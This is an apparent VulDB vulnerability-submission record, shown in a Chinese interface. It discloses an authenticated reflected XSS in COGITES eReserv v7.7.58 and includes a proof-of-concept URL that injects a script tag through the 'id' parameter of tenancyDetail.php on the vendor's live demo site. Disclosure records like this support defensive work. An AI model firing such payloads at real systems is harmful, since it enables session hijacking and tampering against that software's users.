提交 #274372: COGITES eReserv v7.7.58 Reflected XSS (authenticated)信息

标题COGITES eReserv v7.7.58 Reflected XSS (authenticated)
描述You will have to authenticate to their demo online for the purpose of this PoC On admin panel (Authenticated): The "id=" parameter on tenancyDetail.php is vulnerable to reflected XSS. proof of concept: https://my.e-reserv.com/00000000ereservpro/front/admin/tenancyDetail.php?id=id=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
用户
 rubx (UID 62535)
提交2024-01-28 17時57分 (2 年前)
管理2024-01-29 14時35分 (21 hours later)
状态已接受
VulDB条目252303 [Cogites eReserv 7.7.58 tenancyDetail.php 标识符 跨网站脚本]
积分15

Want to know what is going to be exploited?

We predict KEV entries!